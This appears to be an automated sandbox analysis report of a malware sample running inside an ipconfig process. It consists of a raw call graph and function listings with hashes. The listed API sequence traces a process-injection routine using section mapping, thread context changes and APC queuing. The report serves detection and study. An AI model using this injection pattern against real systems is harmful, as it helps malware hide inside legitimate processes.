e3f1c2 103457 e3f1ed 103456->103457 103837 e4a220 103456->103837 103458 e4a450 2 API calls 103457->103458 103458->103454 103461 e48b8f 103460->103461 103462 e44e40 LdrLoadDll 103461->103462 103463 e39c93 103462->103463 103464 e48a30 103463->103464 103485 e4a5c0 103464->103485 103468 e4b289 103467->103468 103492 e44a40 103468->103492 103470 e4b2a1 103471 e4b2aa 103470->103471 103531 e4b0b0 103470->103531 103471->103436 103473 e4b2be 103473->103471 103549 e49ec0 103473->103549 103475 e4b2f2 103475->103475 103554 e4bd80 103475->103554 103801 e37ea0 103478->103801 103480 e39ac1 103480->103438 103481 e39aba 103481->103480 103814 e38160 103481->103814 103484->103440 103488 e4af20 103485->103488 103487 e48a45 103487->103434 103489 e4af30 103488->103489 103491 e4af52 103488->103491 103490 e44e40 LdrLoadDll 103489->103490 103490->103491 103491->103487 103493 e44d75 103492->103493 103503 e44a54 103492->103503 103493->103470 103496 e44b80 103560 e4a320 103496->103560 103497 e44b63 103617 e4a420 LdrLoadDll 103497->103617 103500 e44b6d 103500->103470 103501 e44ba7 103502 e4bd80 2 API calls 103501->103502 103506 e44bb3 103502->103506 103503->103493 103557 e49c10 103503->103557 103504 e44d39 103507 e4a450 2 API calls 103504->103507 103505 e44d4f 103626 e44780 LdrLoadDll NtReadFile NtClose 103505->103626 103506->103500 103506->103504 103506->103505 103511 e44c42 103506->103511 103508 e44d40 103507->103508 103508->103470 103510 e44d62 103510->103470 103512 e44ca9 103511->103512 103514 e44c51 103511->103514 103512->103504 103513 e44cbc 103512->103513 103619 e4a2a0 103513->103619 103516 e44c56 103514->103516 103517 e44c6a 103514->103517 103618 e44640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103516->103618 103520 e44c87 103517->103520 103521 e44c6f 103517->103521 103520->103508 103575 e44400 103520->103575 103563 e446e0 103521->103563 103523 e44c60 103523->103470 103525 e44c7d 103525->103470 103527 e44d1c 103623 e4a450 103527->103623 103528 e44c9f 103528->103470 103530 e44d28 103530->103470 103533 e4b0c1 103531->103533 103532 e4b0d3 103532->103473 103533->103532 103534 e4bd00 LdrLoadDll 103533->103534 103535 e4b0f4 103534->103535 103644 e44060 103535->103644 103537 e4b140 103537->103473 103538 e4b117 103538->103537 103539 e44060 3 API calls 103538->103539 103541 e4b139 103539->103541 103541->103537 103676 e45380 103541->103676 103542 e4b1ca 103543 e4b1da 103542->103543 103770 e4aec0 LdrLoadDll 103542->103770 103686 e4ad30 103543->103686 103546 e4b208 103765 e49e80 103546->103765 103550 e4af20 LdrLoadDll 103549->103550 103551 e49edc 103550->103551 103795 38a2c0a 103551->103795 103552 e49ef7 103552->103475 103798 e4a630 103554->103798 103556 e4b319 103556->103436 103558 e44b34 103557->103558 103559 e4af20 LdrLoadDll 103557->103559 103558->103496 103558->103497 103558->103500 103559->103558 103561 e4af20 LdrLoadDll 103560->103561 103562 e4a33c NtCreateFile 103561->103562 103562->103501 103564 e446fc 103563->103564 103565 e4a2a0 LdrLoadDll 103564->103565 103566 e4471d 103565->103566 103567 e44724 103566->103567 103568 e44738 103566->103568 103569 e4a450 2 API calls 103567->103569 103570 e4a450 2 API calls 103568->103570 103571 e4472d 103569->103571 103572 e44741 103570->103572 103571->103525 103627 e4bf90 LdrLoadDll RtlAllocateHeap 103572->103627 103574 e4474c 103574->103525 103576 e4447e 103575->103576 103577 e4444b 103575->103577 103579 e445c9 103576->103579 103584 e4449a 103576->103584 103578 e4a2a0 LdrLoadDll 103577->103578 103580 e44466 103578->103580 103581 e4a2a0 LdrLoadDll 103579->103581 103582 e4a450 2 API calls 103580->103582 103583 e445e4 103581->103583 103585 e4446f 103582->103585 103640 e4a2e0 LdrLoadDll 103583->103640 103586 e4a2a0 LdrLoadDll 103584->103586 103585->103528 103587 e444b5 103586->103587 103589 e444d1 103587->103589 103590 e444bc 103587->103590 103591 e444d6 103589->103591 103592 e444ec 103589->103592 103594 e4a450 2 API calls 103590->103594 103596 e4a450 2 API calls 103591->103596 103603 e444f1 103592->103603 103628 e4bf50 103592->103628 103593 e4461e 103597 e4a450 2 API calls 103593->103597 103595 e444c5 103594->103595 103595->103528 103599 e444df 103596->103599 103598 e44629 103597->103598 103598->103528 103599->103528 103602 e44557 103604 e4456e 103602->103604 103639 e4a260 LdrLoadDll 103602->103639 103610 e44503 103603->103610 103631 e4a3d0 103603->103631 103606 e44575 103604->103606 103607 e4458a 103604->103607 103608 e4a450 2 API calls 103606->103608 103609 e4a450 2 API calls 103607->103609 103608->103610 103611 e44593 103609->103611 103610->103528 103612 e445bf 103611->103612 103634 e4bb50 103611->103634 103612->103528 103614 e445aa 103615 e4bd80 2 API calls 103614->103615 103616 e445b3 103615->103616 103616->103528 103617->103500 103618->103523 103620 e4af20 LdrLoadDll 103619->103620 103621 e44d04 103620->103621 103622 e4a2e0 LdrLoadDll 103621->103622 103622->103527 103624 e4a46c NtClose 103623->103624 103625 e4af20 LdrLoadDll 103623->103625 103624->103530 103625->103624 103626->103510 103627->103574 103630 e4bf68 103628->103630 103641 e4a5f0 103628->103641 103630->103603 103632 e4af20 LdrLoadDll 103631->103632 103633 e4a3ec NtReadFile 103632->103633 103633->103602 103635 e4bb74 103634->103635 103636 e4bb5d 103634->103636 103635->103614 103636->103635 103637 e4bf50 2 API calls 103636->103637 103638 e4bb8b 103637->103638 103638->103614 103639->103604 103640->103593 103642 e4af20 LdrLoadDll 103641->103642 103643 e4a60c RtlAllocateHeap 103642->103643 103643->103630 103645 e44071 103644->103645 103647 e44079 103644->103647 103645->103538 103646 e4434c 103646->103538 103647->103646 103771 e4cef0 103647->103771 103649 e440cd 103650 e4cef0 2 API calls 103649->103650 103653 e440d8 103650->103653 103651 e44126 103654 e4cef0 2 API calls 103651->103654 103653->103651 103776 e4cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 103653->103776 103777 e4d020 103653->103777 103657 e4413a 103654->103657 103656 e44197 103658 e4cef0 2 API calls 103656->103658 103657->103656 103659 e4d020 3 API calls 103657->103659 103660 e441ad 103658->103660 103659->103657 103661 e441ea 103660->103661 103664 e4d020 3 API calls 103660->103664 103662 e4cef0 2 API calls 103661->103662 103663 e441f5 103662->103663 103665 e4d020 3 API calls 103663->103665 103672 e4422f 103663->103672 103664->103660 103665->103663 103667 e44324 103784 e4cf50 LdrLoadDll RtlFreeHeap 103667->103784 103669 e4432e 103785 e4cf50 LdrLoadDll RtlFreeHeap 103669->103785 103671 e44338 103786 e4cf50 LdrLoadDll RtlFreeHeap 103671->103786 103783 e4cf50 LdrLoadDll RtlFreeHeap 103672->103783 103674 e44342 103787 e4cf50 LdrLoadDll RtlFreeHeap 103674->103787 103677 e45391 103676->103677 103678 e44a40 8 API calls 103677->103678 103680 e453a7 103678->103680 103679 e453fa 103679->103542 103680->103679 103681 e453f5 103680->103681 103682 e453e2 103680->103682 103684 e4bd80 2 API calls 103681->103684 103683 e4bd80 2 API calls 103682->103683 103685 e453e7 103683->103685 103684->103679 103685->103542 103687 e4ad44 103686->103687 103688 e4abf0 LdrLoadDll 103686->103688 103788 e4abf0 103687->103788 103688->103687 103691 e4abf0 LdrLoadDll 103692 e4ad56 103691->103692 103693 e4abf0 LdrLoadDll 103692->103693 103694 e4ad5f 103693->103694 103695 e4abf0 LdrLoadDll 103694->103695 103696 e4ad68 103695->103696 103697 e4abf0 LdrLoadDll 103696->103697 103698 e4ad71 103697->103698 103699 e4abf0 LdrLoadDll 103698->103699 103700 e4ad7d 103699->103700 103701 e4abf0 LdrLoadDll 103700->103701 103702 e4ad86 103701->103702 103703 e4abf0 LdrLoadDll 103702->103703 103704 e4ad8f 103703->103704 103705 e4abf0 LdrLoadDll 103704->103705 103706 e4ad98 103705->103706 103707 e4abf0 LdrLoadDll 103706->103707 103708 e4ada1 103707->103708 103709 e4abf0 LdrLoadDll 103708->103709 103710 e4adaa 103709->103710 103711 e4abf0 LdrLoadDll 103710->103711 103712 e4adb6 103711->103712 103713 e4abf0 LdrLoadDll 103712->103713 103714 e4adbf 103713->103714 103715 e4abf0 LdrLoadDll 103714->103715 103716 e4adc8 103715->103716 103717 e4abf0 LdrLoadDll 103716->103717 103718 e4add1 103717->103718 103719 e4abf0 LdrLoadDll 103718->103719 103720 e4adda 103719->103720 103721 e4abf0 LdrLoadDll 103720->103721 103722 e4ade3 103721->103722 103723 e4abf0 LdrLoadDll 103722->103723 103724 e4adef 103723->103724 103725 e4abf0 LdrLoadDll 103724->103725 103726 e4adf8 103725->103726 103727 e4abf0 LdrLoadDll 103726->103727 103728 e4ae01 103727->103728 103729 e4abf0 LdrLoadDll 103728->103729 103730 e4ae0a 103729->103730 103731 e4abf0 LdrLoadDll 103730->103731 103732 e4ae13 103731->103732 103733 e4abf0 LdrLoadDll 103732->103733 103734 e4ae1c 103733->103734 103735 e4abf0 LdrLoadDll 103734->103735 103736 e4ae28 103735->103736 103737 e4abf0 LdrLoadDll 103736->103737 103738 e4ae31 103737->103738 103739 e4abf0 LdrLoadDll 103738->103739 103740 e4ae3a 103739->103740 103741 e4abf0 LdrLoadDll 103740->103741 103742 e4ae43 103741->103742 103743 e4abf0 LdrLoadDll 103742->103743 103744 e4ae4c 103743->103744 103745 e4abf0 LdrLoadDll 103744->103745 103746 e4ae55 103745->103746 103747 e4abf0 LdrLoadDll 103746->103747 103748 e4ae61 103747->103748 103749 e4abf0 LdrLoadDll 103748->103749 103750 e4ae6a 103749->103750 103751 e4abf0 LdrLoadDll 103750->103751 103752 e4ae73 103751->103752 103753 e4abf0 LdrLoadDll 103752->103753 103754 e4ae7c 103753->103754 103755 e4abf0 LdrLoadDll 103754->103755 103756 e4ae85 103755->103756 103757 e4abf0 LdrLoadDll 103756->103757 103758 e4ae8e 103757->103758 103759 e4abf0 LdrLoadDll 103758->103759 103760 e4ae9a 103759->103760 103761 e4abf0 LdrLoadDll 103760->103761 103762 e4aea3 103761->103762 103763 e4abf0 LdrLoadDll 103762->103763 103764 e4aeac 103763->103764 103764->103546 103766 e4af20 LdrLoadDll 103765->103766 103767 e49e9c 103766->103767 103794 38a2df0 LdrInitializeThunk 103767->103794 103768 e49eb3 103768->103473 103770->103543 103772 e4cf06 103771->103772 103773 e4cf00 103771->103773 103774 e4bf50 2 API calls 103772->103774 103773->103649 103775 e4cf2c 103774->103775 103775->103649 103776->103653 103778 e4cf90 103777->103778 103779 e4cfed 103778->103779 103780 e4bf50 2 API calls 103778->103780 103779->103653 103781 e4cfca 103780->103781 103782 e4bd80 2 API calls 103781->103782 103782->103779 103783->103667 103784->103669 103785->103671 103786->103674 103787->103646 103789 e4ac0b 103788->103789 103790 e44e40 LdrLoadDll 103789->103790 103791 e4ac2b 103790->103791 103792 e44e40 LdrLoadDll 103791->103792 103793 e4acd7 103791->103793 103792->103793 103793->103691 103794->103768 103796 38a2c1f LdrInitializeThunk 103795->103796 103797 38a2c11 103795->103797 103796->103552 103797->103552 103799 e4af20 LdrLoadDll 103798->103799 103800 e4a64c RtlFreeHeap 103799->103800 103800->103556 103802 e37eb0 103801->103802 103803 e37eab 103801->103803 103804 e4bd00 LdrLoadDll 103802->103804 103803->103481 103807 e37ed5 103804->103807 103805 e37f38 103805->103481 103806 e49e80 2 API calls 103806->103807 103807->103805 103807->103806 103808 e37f3e 103807->103808 103812 e4bd00 LdrLoadDll 103807->103812 103817 e4a580 103807->103817 103810 e37f64 103808->103810 103811 e4a580 2 API calls 103808->103811 103810->103481 103813 e37f55 103811->103813 103812->103807 103813->103481 103815 e4a580 2 API calls 103814->103815 103816 e3817e 103815->103816 103816->103438 103818 e4a59c 103817->103818 103819 e4af20 LdrLoadDll 103817->103819 103822 38a2c70 LdrInitializeThunk 103818->103822 103819->103818 103820 e4a5b3 103820->103807 103822->103820 103824 e4b583 103823->103824 103825 e3ace0 LdrLoadDll 103824->103825 103826 e39c3a 103825->103826 103826->103444 103828 e3b053 103827->103828 103830 e3b0d0 103828->103830 103842 e49c50 LdrLoadDll 103828->103842 103830->103451 103832 e4af20 LdrLoadDll 103831->103832 103833 e3f1ab 103832->103833 103833->103454 103834 e4a790 103833->103834 103835 e4a7af LookupPrivilegeValueW 103834->103835 103836 e4af20 LdrLoadDll 103834->103836 103835->103456 103836->103835 103838 e4af20 LdrLoadDll 103837->103838 103839 e4a23c 103838->103839 103843 38a2ea0 LdrInitializeThunk 103839->103843 103840 e4a25b 103840->103457 103842->103830 103843->103840 103845 e3b1e0 103844->103845 103846 e3b030 LdrLoadDll 103845->103846 103847 e3b1f4 103846->103847 103847->103391 103849 e3af24 103848->103849 103921 e49c50 LdrLoadDll 103849->103921 103851 e3af5e 103851->103393 103853 e3f39c 103852->103853 103854 e3b1b0 LdrLoadDll 103853->103854 103855 e3f3ae 103854->103855 103922 e3f280 103855->103922 103858 e3f3c9 103859 e4a450 2 API calls 103858->103859 103861 e3f3d4 103858->103861 103859->103861 103860 e3f3e1 103862 e4a450 2 API calls 103860->103862 103863 e3f3f2 103860->103863 103861->103396 103862->103863 103863->103396 103865 e3f42c 103864->103865 103941 e3b2a0 103865->103941 103867 e3f43e 103868 e3f280 3 API calls 103867->103868 103869 e3f44f 103868->103869 103870 e3f471 103869->103870 103871 e3f459 103869->103871 103872 e3f482 103870->103872 103875 e4a450 2 API calls 103870->103875 103873 e3f464 103871->103873 103874 e4a450 2 API calls 103871->103874 103872->103398 103873->103398 103874->103873 103875->103872 103877 e3ca96 103876->103877 103878 e3caa0 103876->103878 103877->103407 103879 e3af00 LdrLoadDll 103878->103879 103880 e3cb3e 103879->103880 103881 e3cb64 103880->103881 103882 e3b030 LdrLoadDll 103880->103882 103881->103407 103883 e3cb80 103882->103883 103884 e44a40 8 API calls 103883->103884 103885 e3cbd5 103884->103885 103885->103407 103887 e3d636 103886->103887 103888 e3b030 LdrLoadDll 103887->103888 103889 e3d64a 103888->103889 103945 e3d300 103889->103945 103891 e3908b 103892 e3cbf0 103891->103892 103893 e3cc16 103892->103893 103894 e3b030 LdrLoadDll 103893->103894 103895 e3cc99 103893->103895 103894->103895 103896 e3b030 LdrLoadDll 103895->103896 103897 e3cd06 103896->103897 103898 e3af00 LdrLoadDll 103897->103898 103899 e3cd6f 103898->103899 103900 e3b030 LdrLoadDll 103899->103900 103901 e3ce1f 103900->103901 103901->103419 103905 e38d14 103902->103905 103974 e3f6c0 103902->103974 103904 e38f25 103904->103376 103905->103904 103979 e44390 103905->103979 103907 e38d70 103907->103904 103982 e38ab0 103907->103982 103910 e4cef0 2 API calls 103911 e38db2 103910->103911 103912 e4d020 3 API calls 103911->103912 103914 e38dc7 103912->103914 103913 e37ea0 3 API calls 103913->103914 103914->103904 103914->103913 103917 e3c7a0 16 API calls 103914->103917 103918 e38160 2 API calls 103914->103918 103987 e3f660 103914->103987 103991 e3f070 19 API calls 103914->103991 103917->103914 103918->103914 103919->103400 103920->103418 103921->103851 103923 e3f29a 103922->103923 103931 e3f350 103922->103931 103924 e3b030 LdrLoadDll 103923->103924 103925 e3f2bc 103924->103925 103932 e49f00 103925->103932 103927 e3f2fe 103935 e49f40 103927->103935 103930 e4a450 2 API calls 103930->103931 103931->103858 103931->103860 103933 e49f1c 103932->103933 103934 e4af20 LdrLoadDll 103932->103934 103933->103927 103934->103933 103936 e4af20 LdrLoadDll 103935->103936 103937 e49f5c 103936->103937 103940 38a35c0 LdrInitializeThunk 103937->103940 103938 e3f344 103938->103930 103940->103938 103942 e3b2aa 103941->103942 103943 e3b030 LdrLoadDll 103942->103943 103944 e3b303 103943->103944 103944->103867 103946 e3d317 103945->103946 103954 e3f700 103946->103954 103950 e3d38b 103951 e3d392 103950->103951 103965 e4a260 LdrLoadDll 103950->103965 103951->103891 103953 e3d3a5 103953->103891 103955 e3f725 103954->103955 103966 e381a0 103955->103966 103957 e3d35f 103962 e4a6a0 103957->103962 103958 e44a40 8 API calls 103960 e3f749 103958->103960 103960->103957 103960->103958 103961 e4bd80 2 API calls 103960->103961 103973 e3f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 103960->103973 103961->103960 103963 e4af20 LdrLoadDll 103962->103963 103964 e4a6bf CreateProcessInternalW 103963->103964 103964->103950 103965->103953 103967 e3829f 103966->103967 103968 e381b5 103966->103968 103967->103960 103968->103967 103969 e44a40 8 API calls 103968->103969 103970 e38222 103969->103970 103971 e4bd80 2 API calls 103970->103971 103972 e38249 103970->103972 103971->103972 103972->103960 103973->103960 103975 e44e40 LdrLoadDll 103974->103975 103976 e3f6df 103975->103976 103977 e3f6e6 SetErrorMode 103976->103977 103978 e3f6ed 103976->103978 103977->103978 103978->103905 103981 e443b6 103979->103981 103992 e3f490 103979->103992 103981->103907 103983 e4bd00 LdrLoadDll 103982->103983 103986 e38ad5 103982->103986 103983->103986 103984 e38cea 103984->103910 103986->103984 104011 e49840 103986->104011 103988 e3f673 103987->103988 104059 e49e50 103988->104059 103991->103914 103993 e3f4ad 103992->103993 103999 e49f80 103993->103999 103995 e3f4f5 103995->103981 104000 e4af20 LdrLoadDll 103999->104000 104001 e49f9c 104000->104001 104009 38a2f30 LdrInitializeThunk 104001->104009 104002 e3f4ee 104002->103995 104004 e49fd0 104002->104004 104005 e4af20 LdrLoadDll 104004->104005 104006 e49fec 104005->104006 104010 38a2d10 LdrInitializeThunk 104006->104010 104007 e3f51e 104007->103981 104009->104002 104010->104007 104012 e4bf50 2 API calls 104011->104012 104013 e49857 104012->104013 104032 e39310 104013->104032 104015 e49872 104016 e498b0 104015->104016 104017 e49899 104015->104017 104020 e4bd00 LdrLoadDll 104016->104020 104018 e4bd80 2 API calls 104017->104018 104019 e498a6 104018->104019 104019->103984 104021 e498ea 104020->104021 104022 e4bd00 LdrLoadDll 104021->104022 104023 e49903 104022->104023 104027 e49ba4 104023->104027 104038 e4bd40 LdrLoadDll 104023->104038 104025 e49b89 104026 e49b90 104025->104026 104025->104027 104028 e4bd80 2 API calls 104026->104028 104030 e4bd80 2 API calls 104027->104030 104029 e49b9a 104028->104029 104029->103984 104031 e49bf9 104030->104031 104031->103984 104033 e39335 104032->104033 104034 e3ace0 LdrLoadDll 104033->104034 104035 e39368 104034->104035 104037 e3938d 104035->104037 104039 e3cf10 104035->104039 104037->104015 104038->104025 104040 e3cf3c 104039->104040 104041 e4a1a0 LdrLoadDll 104040->104041 104042 e3cf55 104041->104042 104043 e3cf5c 104042->104043 104044 e3cf7f 104042->104044 104050 e4a1e0 104042->104050 104043->104037 104044->104043 104055 e4a7d0 104044->104055 104047 e3cf97 104048 e4a450 2 API calls 104047->104048 104049 e3cfba 104048->104049 104049->104037 104051 e4af20 LdrLoadDll 104050->104051 104052 e4a1fc 104051->104052 104058 38a2ca0 LdrInitializeThunk 104052->104058 104053 e4a217 104053->104044 104056 e4af20 LdrLoadDll 104055->104056 104057 e4a7ef 104056->104057 104057->104047 104058->104053 104060 e49e6c 104059->104060 104061 e4af20 LdrLoadDll 104059->104061 104064 38a2dd0 LdrInitializeThunk 104060->104064 104061->104060 104062 e3f69e 104062->103914 104064->104062 104065 38a2ad0 LdrInitializeThunk 104068 369cb84 104071 369a042 104068->104071 104070 369cba5 104073 369a06b 104071->104073 104072 369a56c 104072->104070 104073->104072 104074 369a182 NtQueryInformationProcess 104073->104074 104076 369a1ba 104074->104076 104075 369a1ef 104075->104070 104076->104075 104077 369a2db 104076->104077 104078 369a290 104076->104078 104079 369a2fc NtSuspendThread 104077->104079 104100 3699de2 NtCreateSection NtMapViewOfSection NtClose 104078->104100 104081 369a30d 104079->104081 104083 369a331 104079->104083 104081->104070 104082 369a2cf 104082->104070 104086 369a412 104083->104086 104091 3699bb2 104083->104091 104085 369a531 104088 369a552 NtResumeThread 104085->104088 104086->104085 104087 369a4a6 NtSetContextThread 104086->104087 104090 369a4bd 104087->104090 104088->104072 104089 369a51c NtQueueApcThread 104089->104085 104090->104085 104090->104089 104092 3699bf7 104091->104092 104093 3699c66 NtCreateSection 104092->104093 104094 3699d4e 104093->104094 104095 3699ca0 104093->104095 104094->104086 104096 3699cc1 NtMapViewOfSection 104095->104096 104096->104094 104097 3699d0c 104096->104097 104097->104094 104098 3699d88 104097->104098 104099 3699dc5 NtClose 104098->104099 104099->104086 104100->104082

                                                                                                                              Executed Functions

                                                                                                                              Function 0369A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 0369A19F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1778838933-4108050209
                                                                                                                              • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                              • Instruction ID: 02f70afb98b8649c7c3c0c28981044d3ab3744c67d536167417b8e21547a6caa
                                                                                                                              • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                              • Instruction Fuzzy Hash: DCF15F74528A8C8FDFA5EF68C894AEEB7E4FB98304F40462ED44ACB250DF349645CB45
                                                                                                                              Function 03699BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 302 3699baf-3699bfe call 3699102 305 3699c0c-3699c9a call 369b942 * 2 NtCreateSection 302->305 306 3699c00 302->306 312 3699d5a-3699d68 305->312 313 3699ca0-3699d0a call 369b942 NtMapViewOfSection 305->313 307 3699c02-3699c0a 306->307 307->305 307->307 316 3699d0c-3699d4c 313->316 317 3699d52 313->317 319 3699d69-3699d6b 316->319 320 3699d4e-3699d4f 316->320 317->312 321 3699d88-3699ddc call 369cd62 NtClose 319->321 322 3699d6d-3699d72 319->322 320->317 323 3699d74-3699d86 call 3699172 322->323 323->321
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CloseCreateView
                                                                                                                              • String ID: @$@
                                                                                                                              • API String ID: 1133238012-149943524
                                                                                                                              • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                              • Instruction ID: fde9c1b17f3c41a76f4aeafe862ce4e02b37acf000651b5a22428e73e52ca045
                                                                                                                              • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                              • Instruction Fuzzy Hash: E2619070218B088FDB58EF68D8856AABBE4FF98314F50062EE58AC3251DF35D441CB86
                                                                                                                              Function 03699BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 362 3699bb2-3699bef 363 3699bf7-3699bfe 362->363 364 3699bf2 call 3699102 362->364 365 3699c0c-3699c9a call 369b942 * 2 NtCreateSection 363->365 366 3699c00 363->366 364->363 372 3699d5a-3699d68 365->372 373 3699ca0-3699d0a call 369b942 NtMapViewOfSection 365->373 367 3699c02-3699c0a 366->367 367->365 367->367 376 3699d0c-3699d4c 373->376 377 3699d52 373->377 379 3699d69-3699d6b 376->379 380 3699d4e-3699d4f 376->380 377->372 381 3699d88-3699ddc call 369cd62 NtClose 379->381 382 3699d6d-3699d72 379->382 380->377 383 3699d74-3699d86 call 3699172 382->383 383->381
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateView
                                                                                                                              • String ID: @$@
                                                                                                                              • API String ID: 1585966358-149943524
                                                                                                                              • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                              • Instruction ID: d2c49428a54c5c447b5f059778b9e0615ec354cca319d4a895112981782f87d9
                                                                                                                              • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                              • Instruction Fuzzy Hash: 64517EB0618B088FDB58DF58D8956AABBE4FF88314F50062EE98EC3651DF35D441CB86
                                                                                                                              Function 0369A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 0369A19F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1778838933-4108050209
                                                                                                                              • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                              • Instruction ID: 0975f5601fb7e297412e13654819b81c3e5b9b5a6f94ad5601251c9b5624fb38
                                                                                                                              • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                              • Instruction Fuzzy Hash: 1B514E70914A9C8FEB69EF68C8946EEBBF4FB98304F40462ED44AD7210DF309645CB45
                                                                                                                              Function 00E4A31B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 638 e4a31b-e4a336 639 e4a33c-e4a371 NtCreateFile 638->639 640 e4a337 call e4af20 638->640 640->639
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00E44BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E44BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00E4A36D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID: .z`
                                                                                                                              • API String ID: 823142352-1441809116
                                                                                                                              • Opcode ID: d194b2b644b6ee93909844aef6977279dfd455d3e787a638be09d029667fb717
                                                                                                                              • Instruction ID: 274a5cfb523537d534d6f282c627ec2a10455b43d536d79c347b8029a339690e
                                                                                                                              • Opcode Fuzzy Hash: d194b2b644b6ee93909844aef6977279dfd455d3e787a638be09d029667fb717
                                                                                                                              • Instruction Fuzzy Hash: E401D2B2200108BFCB08CF98D895DEB77A9BF8C354F158208BA0993241C630E8118BA4
                                                                                                                              Function 00E4A320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 641 e4a320-e4a371 call e4af20 NtCreateFile
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00E44BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E44BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00E4A36D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID: .z`
                                                                                                                              • API String ID: 823142352-1441809116
                                                                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                              • Instruction ID: c22f747b6e4e1dc8fd10d28f79362019ea44ec1f551b0a88b15699ea667f9f31
                                                                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                              • Instruction Fuzzy Hash: 41F0B2B2200208ABCB08CF88DC85EEB77EDAF8C754F158248BA1D97241C630E8118BA4
